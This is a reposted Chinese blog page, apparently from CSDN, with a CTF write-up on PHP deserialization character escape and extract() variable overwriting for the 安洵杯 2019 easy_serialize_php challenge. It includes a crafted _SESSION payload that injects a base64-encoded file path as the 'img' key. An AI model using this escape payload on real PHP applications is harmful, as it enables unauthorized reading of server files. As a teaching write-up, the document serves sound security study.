码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 反序列化字符逃逸漏洞之


    参考:[安洵杯 2019]easy_serialize_php_甜筒化了 -的博客-CSDN博客_easy_serialize_php

    知识点:

    extract()变量覆盖

    反序列化字符逃逸;

    什么意思呢,就是说当进行反序列化数组的时候,只认前面一个括号里面的内容;例如;

    1. $b='a:1:{s:2:"ei";s:5:"fjksj";}';
    2. var_dump(unserialize($b)) ;
    3. $c='a:1:{s:2:"ei";s:5:"fjksj";}dfjhgksaasdhgerakdj'; //在后面添加了一些干扰字符
    4. var_dump(unserialize($c)) ;

    结果:

    结果是不变的;

    那么如果当序列化后的字符串经过一些函数过滤掉一些字符会发生什么呢;因为序列化后的字符是按照要求严格执行的,什么意思,就是s:1:"a" ; 这个1指得是字符串长度,它会自动往后面截取;

    所以通过这两个规则利用起来就可以构造我们想要的东西;

    这就是反序列化字符逃逸;

    和变量覆盖怎么用?

    变量覆盖是直接将之前的值取代,这里就可以作为 键逃逸;没有变量覆盖就值逃逸;

    至于构造过程参考上述 :

    键逃逸:

    _SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

     这里构造出来的session字典值就只有一个,就是

    flagphp->;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

    然而当经过

    1. if(!$_GET['img_path']){
    2. $_SESSION['img'] = base64_encode('guest_img.png');
    3. }else{
    4. $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    5. }

    之后增加了img->base64_encode('guest_img.png');

    此时serialize($_SESSION)的值就是:

    a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

    但是经过

    filter(serialize($_SESSION));

    就会把第一个flagphp吃掉;

    所以变为:
    a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

     再经过反序列化之后最后的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}就会被忽略掉;

    这就改变了session的键值:
    ";s:48:  ——>a

    img——>ZDBnM19mMWFnLnBocA==

    直接改变img不就可以了嘛!!!

  • 相关阅读:
    【VUE异常】el-popconfirm失效,@confirm事件不生效,点击没有任何反应,刷新页面才能点击
    Spring框架详解
    解决golang无法下载依赖的奇葩问题
    如何通过ChatGPT来快速写论文,怎么提问关键词?
    机器学习:主成分分析笔记
    【手把手】教你玩转SpringCloud Alibaba之Nacos Config深入
    C#,数值计算——函数计算,切比雪夫近似算法(Chebyshev approximation)的计算方法与源程序
    SQLite3安装
    数据结构与算法之图: Leetcode 133. 克隆图 (Typescript版)
    【0135】【libpq】阻塞并完成一个postmaster连接(5)
  • 原文地址:https://blog.csdn.net/qq_58970968/article/details/126005136
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号